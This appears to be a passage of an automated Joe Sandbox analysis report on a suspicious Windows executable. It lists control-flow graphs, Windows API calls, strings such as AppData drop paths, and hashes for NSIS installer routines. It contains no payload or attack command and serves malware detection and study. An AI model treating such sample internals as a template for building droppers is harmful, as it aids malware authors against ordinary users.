                                                • ShowWindow.USER32(00000005,00000000), ref: 00403BB8
                                                • GetClassInfoW.USER32(00000000,RichEdit20W,00433E80), ref: 00403BE4
                                                • GetClassInfoW.USER32(00000000,RichEdit,00433E80), ref: 00403BF1
                                                • RegisterClassW.USER32(00433E80), ref: 00403BFA
                                                • DialogBoxParamW.USER32(?,00000000,00403D3E,00000000), ref: 00403C19
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                • String ID: "C:\Users\user\Desktop\3507071243740008011.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\pechay\transskribere\jon$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                • API String ID: 1975747703-971695124
                                                • Opcode ID: d13a808758802c6e3fc48dc76d19d1d1e2605ae81d2ad2d57bfa7261d619400b
                                                • Instruction ID: b69a5953a59a380dedfc974e339360e26c19c43312473aa69c5b527d033ca56b
                                                • Opcode Fuzzy Hash: d13a808758802c6e3fc48dc76d19d1d1e2605ae81d2ad2d57bfa7261d619400b
                                                • Instruction Fuzzy Hash: 7061A8312003006ED320BF669D46F673A6CEB84B5AF40053FF945B62E2DB7DA9418A2D

                                                Control-flow Graph

                                                control_flow_graph 440 402ec1-402f0f GetTickCount GetModuleFileNameW call 405d74 443 402f11-402f16 440->443 444 402f1b-402f49 call 406282 call 405b9f call 406282 GetFileSize 440->444 445 4030f3-4030f7 443->445 452 403036-403044 call 402e5d 444->452 453 402f4f 444->453 459 403046-403049 452->459 460 403099-40309e 452->460 455 402f54-402f6b 453->455 457 402f6d 455->457 458 402f6f-402f78 call 403315 455->458 457->458 467 4030a0-4030a8 call 402e5d 458->467 468 402f7e-402f85 458->468 462 40304b-403063 call 40332b call 403315 459->462 463 40306d-403097 GlobalAlloc call 40332b call 4030fa 459->463 460->445 462->460 491 403065-40306b 462->491 463->460 489 4030aa-4030bb 463->489 467->460 469 403001-403005 468->469 470 402f87-402f9b call 405d2f 468->470 477 403007-40300e call 402e5d 469->477 478 40300f-403015 469->478 470->478 487 402f9d-402fa4 470->487 477->478 480 403024-40302e 478->480 481 403017-403021 call 40674f 478->481 480->455 488 403034 480->488 481->480 487->478 493 402fa6-402fad 487->493 488->452 494 4030c3-4030c8 489->494 495 4030bd 489->495 491->460 491->463 493->478 496 402faf-402fb6 493->496 497 4030c9-4030cf 494->497 495->494 496->478 498 402fb8-402fbf 496->498 497->497 499 4030d1-4030ec SetFilePointer call 405d2f 497->499 498->478 500 402fc1-402fe1 498->500 503 4030f1 499->503 500->460 502 402fe7-402feb 500->502 504 402ff3-402ffb 502->504 505 402fed-402ff1 502->505 503->445 504->478 506 402ffd-402fff 504->506 505->488 505->504 506->478
                                                APIs
                                                • GetTickCount.KERNEL32 ref: 00402ED2
                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\3507071243740008011.exe,00000400,?,00000006,00000008,0000000A), ref: 00402EEE
                                                  • Part of subcall function 00405D74: GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\3507071243740008011.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D78
                                                  • Part of subcall function 00405D74: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D9A
                                                • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\3507071243740008011.exe,C:\Users\user\Desktop\3507071243740008011.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F3A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                • String ID: "C:\Users\user\Desktop\3507071243740008011.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\3507071243740008011.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                • API String ID: 4283519449-3274353692
                                                • Opcode ID: 63e69acdaec1fdaba5d4a89e2a3b5318abe59b2b0843af0c7679ee6c60d0c948
                                                • Instruction ID: 5fb561c1f1da7fe65fe29aa304fda9dad36d264b5387f138e6185790fd874317
                                                • Opcode Fuzzy Hash: 63e69acdaec1fdaba5d4a89e2a3b5318abe59b2b0843af0c7679ee6c60d0c948
                                                • Instruction Fuzzy Hash: 18510471902216AFDB20AF64DD85B9E7EB8FB00359F15403BF904B62C5C7789E408B6C

                                                Control-flow Graph

                                                control_flow_graph 707 4062a4-4062af 708 4062b1-4062c0 707->708 709 4062c2-4062d8 707->709 708->709 710 4064f0-4064f6 709->710 711 4062de-4062eb 709->711 712 4064fc-406507 710->712 713 4062fd-40630a 710->713 711->710 714 4062f1-4062f8 711->714 715 406512-406513 712->715 716 406509-40650d call 406282 712->716 713->712 717 406310-40631c 713->717 714->710 716->715 718 406322-406360 717->718 719 4064dd 717->719 721 406480-406484 718->721 722 406366-406371 718->722 723 4064eb-4064ee 719->723 724 4064df-4064e9 719->724 727 406486-40648c 721->727 728 4064b7-4064bb 721->728 725 406373-406378 722->725 726 40638a 722->726 723->710 724->710 725->726 729 40637a-40637d 725->729 732 406391-406398 726->732 730 40649c-4064a8 call 406282 727->730 731 40648e-40649a call 4061c9 727->731 733 4064ca-4064db lstrlenW 728->733 734 4064bd-4064c5 call 4062a4 728->734 729->726 735 40637f-406382 729->735 745 4064ad-4064b3 730->745 731->745 737 40639a-40639c 732->737 738 40639d-40639f 732->738 733->710 734->733 735->726 741 406384-406388 735->741 737->738 743 4063a1-4063bf call 406150 738->743 744 4063da-4063dd 738->744 741->732 753 4063c4-4063c8 743->753 746 4063ed-4063f0 744->746 747 4063df-4063eb GetSystemDirectoryW 744->747 745->733 749 4064b5 745->749 751 4063f2-406400 GetWindowsDirectoryW 746->751 752 40645b-40645d 746->752 750 40645f-406463 747->750 754 406478-40647e call 406516 749->754 750->754 759 406465 750->759 751->752 752->750 756 406402-40640c 752->756 757 406468-40646b 753->757 758 4063ce-4063d5 call 4062a4 753->758 754->733 762 406426-40643c SHGetSpecialFolderLocation 756->762 763 40640e-406411 756->763 757->754 760 40646d-406473 lstrcatW 757->760 758->750 759->757 760->754 766 406457 762->766 767 40643e-406455 SHGetPathFromIDListW CoTaskMemFree 762->767 763->762 765 406413-40641a 763->765 769 406422-406424 765->769 766->752 767->750 767->766 769->750 769->762
                                                APIs
                                                • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004063E5
                                                • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,0042C228,?,0040531D,0042C228,00000000), ref: 004063F8
                                                • SHGetSpecialFolderLocation.SHELL32(0040531D,0041D800,00000000,0042C228,?,0040531D,0042C228,00000000), ref: 00406434
                                                • SHGetPathFromIDListW.SHELL32(0041D800,Call), ref: 00406442
                                                • CoTaskMemFree.OLE32(0041D800), ref: 0040644D
                                                • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406473
                                                • lstrlenW.KERNEL32(Call,00000000,0042C228,?,0040531D,0042C228,00000000), ref: 004064CB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                • API String ID: 717251189-1230650788
                                                • Opcode ID: 5757adc76ebd299de9e3f21c9246a654aa3bace2b5e710508428971d5ba8c1fc
                                                • Instruction ID: 2bc9f3e321a063d065e255e84c3e845f89f4622f689527909a28eedc1d3cb15f
                                                • Opcode Fuzzy Hash: 5757adc76ebd299de9e3f21c9246a654aa3bace2b5e710508428971d5ba8c1fc
                                                • Instruction Fuzzy Hash: 1D613631A00205ABDF209F64CD41ABE37A5AF44318F16813FE947B62D1D77C5AA1CB9D

                                                Control-flow Graph

                                                control_flow_graph 834 40176f-401794 call 402c37 call 405bca 839 401796-40179c call 406282 834->839 840 40179e-4017b0 call 406282 call 405b53 lstrcatW 834->840 845 4017b5-4017b6 call 406516 839->845 840->845 849 4017bb-4017bf 845->849 850 4017c1-4017cb call 4065c5 849->850 851 4017f2-4017f5 849->851 858 4017dd-4017ef 850->858 859 4017cd-4017db CompareFileTime 850->859 853 4017f7-4017f8 call 405d4f 851->853 854 4017fd-401819 call 405d74 851->854 853->854 861 40181b-40181e 854->861 862 40188d-4018b6 call 4052e6 call 4030fa 854->862 858->851 859->858 863 401820-40185e call 406282 * 2 call 4062a4 call 406282 call 4058e4 861->863 864 40186f-401879 call 4052e6 861->864 876 4018b8-4018bc 862->876 877 4018be-4018ca SetFileTime 862->877 863->849 897 401864-401865 863->897 874 401882-401888 864->874 878 402ac8 874->878 876->877 880 4018d0-4018db CloseHandle 876->880 877->880 882 402aca-402ace 878->882 883 4018e1-4018e4 880->883 884 402abf-402ac2 880->884 886 4018e6-4018f7 call 4062a4 lstrcatW 883->886 887 4018f9-4018fc call 4062a4 883->887 884->878 891 401901-4022f6 call 4058e4 886->891 887->891 891->882 897->874 899 401867-401868 897->899 899->864
                                                APIs
                                                • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\pechay\transskribere\jon\Ossicular,?,?,00000031), ref: 004017B0
                                                • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\pechay\transskribere\jon\Ossicular,?,?,00000031), ref: 004017D5
                                                  • Part of subcall function 00406282: lstrcpynW.KERNEL32(?,?,00000400,00403444,00433EE0,NSIS Error,?,00000006,00000008,0000000A), ref: 0040628F
                                                  • Part of subcall function 004052E6: lstrlenW.KERNEL32(0042C228,00000000,0041D800,74DF23A0,?,?,?,?,?,?,?,?,?,0040325E,00000000,?), ref: 0040531E
                                                  • Part of subcall function 004052E6: lstrlenW.KERNEL32(0040325E,0042C228,00000000,0041D800,74DF23A0,?,?,?,?,?,?,?,?,?,0040325E,00000000), ref: 0040532E
                                                  • Part of subcall function 004052E6: lstrcatW.KERNEL32(0042C228,0040325E,0040325E,0042C228,00000000,0041D800,74DF23A0), ref: 00405341
                                                  • Part of subcall function 004052E6: SetWindowTextW.USER32(0042C228,0042C228), ref: 00405353
                                                  • Part of subcall function 004052E6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405379
                                                  • Part of subcall function 004052E6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405393
                                                  • Part of subcall function 004052E6: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                • String ID: C:\Users\user\AppData\Local\Temp\nsaD5CD.tmp$C:\Users\user\AppData\Local\Temp\nsaD5CD.tmp\System.dll$C:\Users\user\AppData\Roaming\pechay\transskribere\jon\Ossicular$Call
                                                • API String ID: 1941528284-723589924
                                                • Opcode ID: 5b350da25249687dd4719405322e9856b363981bc1dd38a50fc9a6532880dae0
                                                • Instruction ID: 71989b97474780e21d9e3883d12846d469cfbdfaa42366440e3466e884ca0043
                                                • Opcode Fuzzy Hash: 5b350da25249687dd4719405322e9856b363981bc1dd38a50fc9a6532880dae0
                                                • Instruction Fuzzy Hash: C1419431900518BECF11BBA5DC46DAF3679EF45328F20423FF412B50E1DA3C8A519A6D

                                                Control-flow Graph

                                                control_flow_graph 900 4030fa-403111 901 403113 900->901 902 40311a-403123 900->902 901->902 903 403125 902->903 904 40312c-403131 902->904 903->904 905 403141-40314e call 403315 904->905 906 403133-40313c call 40332b 904->906 910 403303 905->910 911 403154-403158 905->911 906->905 912 403305-403306 910->912 913 4032ae-4032b0 911->913 914 40315e-4031a7 GetTickCount 911->914 917 40330e-403312 912->917 915 4032f0-4032f3 913->915 916 4032b2-4032b5 913->916 918 40330b 914->918 919 4031ad-4031b5 914->919 920 4032f5 915->920 921 4032f8-403301 call 403315 915->921 916->918 922 4032b7 916->922 918->917 923 4031b7 919->923 924 4031ba-4031c8 call 403315 919->924 920->921 921->910 934 403308 921->934 927 4032ba-4032c0 922->927 923->924 924->910 933 4031ce-4031d7 924->933 930 4032c2 927->930 931 4032c4-4032d2 call 403315 927->931 930->931 931->910 937 4032d4-4032e0 call 405e26 931->937 936 4031dd-4031fd call 4067bd 933->936 934->918 942 403203-403216 GetTickCount 936->942 943 4032a6-4032a8 936->943 944 4032e2-4032ec 937->944 945 4032aa-4032ac 937->945 946 403261-403263 942->946 947 403218-403220 942->947 943->912 944->927 948 4032ee 944->948 945->912 951 403265-403269 946->951 952 40329a-40329e 946->952 949 403222-403226 947->949 950 403228-40325e MulDiv wsprintfW call 4052e6 947->950 948->918 949->946 949->950 950->946 955 403280-40328b 951->955 956 40326b-403272 call 405e26 951->956 952->919 953 4032a4 952->953 953->918 958 40328e-403292 955->958 960 403277-403279 956->960 958->936 961 403298 958->961 960->945 962 40327b-40327e 960->962 961->918 962->958
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: CountTick$wsprintf
                                                • String ID: ... %d%%$@
                                                • API String ID: 551687249-3859443358
                                                • Opcode ID: bcadc4b8fcc5a9726af7f1001a2bc5a9f2fe7a461361550fb019878be66ece88
                                                • Instruction ID: f75c430432033e5046526aed0a4a2f939c591a2e87bafbbe4e5c1659d7ec9983
                                                • Opcode Fuzzy Hash: bcadc4b8fcc5a9726af7f1001a2bc5a9f2fe7a461361550fb019878be66ece88
                                                • Instruction Fuzzy Hash: 85515A71900219EBDB10CF69DA84B9E7FA8AF45366F14417BEC14B72C0C778DA50CBA9

                                                Control-flow Graph

                                                control_flow_graph 963 402644-40265d call 402c15 966 402663-40266a 963->966 967 402abf-402ac2 963->967 968 40266c 966->968 969 40266f-402672 966->969 970 402ac8-402ace 967->970 968->969 971 4027d6-4027de 969->971 972 402678-402687 call 4061e2 969->972 971->967 972->971 976 40268d 972->976 977 402693-402697 976->977 978 40272c-40272f 977->978 979 40269d-4026b8 ReadFile 977->979 980 402731-402734 978->980 981 402747-402757 call 405df7 978->981 979->971 982 4026be-4026c3 979->982 980->981 983 402736-402741 call 405e55 980->983 981->971 991 402759 981->991 982->971 985 4026c9-4026d7 982->985 983->971 983->981 988 402792-40279e call 4061c9 985->988 989 4026dd-4026ef MultiByteToWideChar 985->989 988->970 989->991 992 4026f1-4026f4 989->992 995 40275c-40275f 991->995 996 4026f6-402701 992->996 995->988 997 402761-402766 995->997 996->995 998 402703-402728 SetFilePointer MultiByteToWideChar 996->998 999 4027a3-4027a7 997->999 1000 402768-40276d 997->1000 998->996 1001 40272a 998->1001 1002 4027c4-4027d0 SetFilePointer 999->1002 1003 4027a9-4027ad 999->1003 1000->999 1004 40276f-402782 1000->1004 1001->991 1002->971 1005 4027b5-4027c2 1003->1005 1006 4027af-4027b3 1003->1006 1004->971 1007 402784-40278a 1004->1007 1005->971 1006->1002 1006->1005 1007->977 1008 402790 1007->1008 1008->971
                                                APIs
                                                • ReadFile.KERNELBASE(?,?,?,?), ref: 004026B0
                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026EB
                                                • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 0040270E
                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 00402724
                                                  • Part of subcall function 00405E55: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405E6B
                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: File$Pointer$ByteCharMultiWide$Read
                                                • String ID: 9
                                                • API String ID: 163830602-2366072709
                                                • Opcode ID: 0f6749e0356039c80119e9da3c7509a60750b74a106ccf27ce207c31930fcb0b
                                                • Instruction ID: 4c47c5b6e7001fd487639b42c981b506dedcea616f9f6d447a3608767ea6fa5a
                                                • Opcode Fuzzy Hash: 0f6749e0356039c80119e9da3c7509a60750b74a106ccf27ce207c31930fcb0b
                                                • Instruction Fuzzy Hash: 8351E575D1021AABDF20DFA5DA88AAEB779FF04304F50443BE511B72D0D7B899828B58

                                                Control-flow Graph

                                                control_flow_graph 1009 4065ec-40660c GetSystemDirectoryW 1010 406610-406612 1009->1010 1011 40660e 1009->1011 1012 406623-406625 1010->1012 1013 406614-40661d 1010->1013 1011->1010 1015 406626-406659 wsprintfW LoadLibraryExW 1012->1015 1013->1012 1014 40661f-406621 1013->1014 1014->1015
                                                APIs
                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406603
                                                • wsprintfW.USER32 ref: 0040663E
                                                • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406652
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                                • String ID: %s%S.dll$UXTHEME$\
                                                • API String ID: 2200240437-1946221925
                                                • Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                • Instruction ID: 71749ee66451d02820e1787a81c679d49f65c12e6a5790e59d0bd58148e6f3af
                                                • Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                • Instruction Fuzzy Hash: 64F021705001196BCF10AB64DD0DFAB3B5CA700304F10487AA546F11D1EBBDDA65CB98

                                                Control-flow Graph

                                                control_flow_graph 1016 4057b5-405800 CreateDirectoryW 1017 405802-405804 1016->1017 1018 405806-405813 GetLastError 1016->1018 1019 40582d-40582f 1017->1019 1018->1019 1020 405815-405829 SetFileSecurityW 1018->1020 1020->1017 1021 40582b GetLastError 1020->1021 1021->1019
                                                APIs
                                                • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057F8
                                                • GetLastError.KERNEL32 ref: 0040580C
                                                • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405821
                                                • GetLastError.KERNEL32 ref: 0040582B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                • String ID: C:\Users\user\Desktop
                                                • API String ID: 3449924974-224404859
                                                • Opcode ID: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                • Instruction ID: 81d47e77b106c5c69b6f53bab6ade4ced08fad65239eb4e1eedbceb886e7a33c
                                                • Opcode Fuzzy Hash: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                • Instruction Fuzzy Hash: 8C01E5B2C00619DADF009FA1D9487EFBFB8EB14354F00803AD945B6281E7789618CFA9

                                                Control-flow Graph

                                                control_flow_graph 1022 405da3-405daf 1023 405db0-405de4 GetTickCount GetTempFileNameW 1022->1023 1024 405df3-405df5 1023->1024 1025 405de6-405de8 1023->1025 1027 405ded-405df0 1024->1027 1025->1023 1026 405dea 1025->1026 1026->1027
                                                APIs
                                                • GetTickCount.KERNEL32 ref: 00405DC1
                                                • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\3507071243740008011.exe",00403371,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,004035BF), ref: 00405DDC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2444032097.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.2444000055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444059716.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444086680.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2444250549.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: CountFileNameTempTick
                                                • String ID: "C:\Users\user\Desktop\3507071243740008011.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                • API String ID: 1716503409-3909342656
                                                • Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                • Instruction ID: 0c0ec814c80ab85915f41b1413265c2d813ce01cabb3ac5407dd3af97de42ecd
                                                • Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
